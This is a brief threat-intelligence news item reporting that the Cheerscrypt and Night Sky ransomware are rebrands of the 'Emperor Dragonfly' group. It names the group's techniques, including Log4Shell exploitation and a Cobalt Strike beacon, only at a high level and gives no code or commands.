Menu
On Monday 3rd of October 2022, the cyber security company, Sygnia released an article that stated that they had investigated a Cheerscrypt ransomware attack which utilized Night Sky ransomware TTPs and then on further analysis, it was revealed that Cheerscrypt and Night Sky are both rebrands of the same threat group, dubbed ‘Emperor Dragonfly’.
The TTPs that were identified were the exploitation of the Apache ‘Log4Shell’ Log4j vulnerability (CVE-2021-44228) to execute PowerShell commands, which initiates a DLL-sideloading technique characteristic as well as the threat actors dropping a Cobalt Strike beacon connected to a C2 address previously associated with Night Sky operations.
In June 2022, both Secureworks and Microsoft reported that the ‘Emperor Dragonfly’ group had been observed using multiple ransomware families like Night Sky, Rook, Pandora, and AtomSilo to conduct government-sponsored cyberespionage under the disguise of being financially-motivated attacks. Therefore, Cheerscrypt is believed to be another one of Emperor Dragonfly’s continual payload rebranding efforts, attempting to evade attribution.
NCSC Threat Reports Feed© 2021 CyberEnsō – Nihon Cyber Defence Co., Ltd. All Rights Reserved.
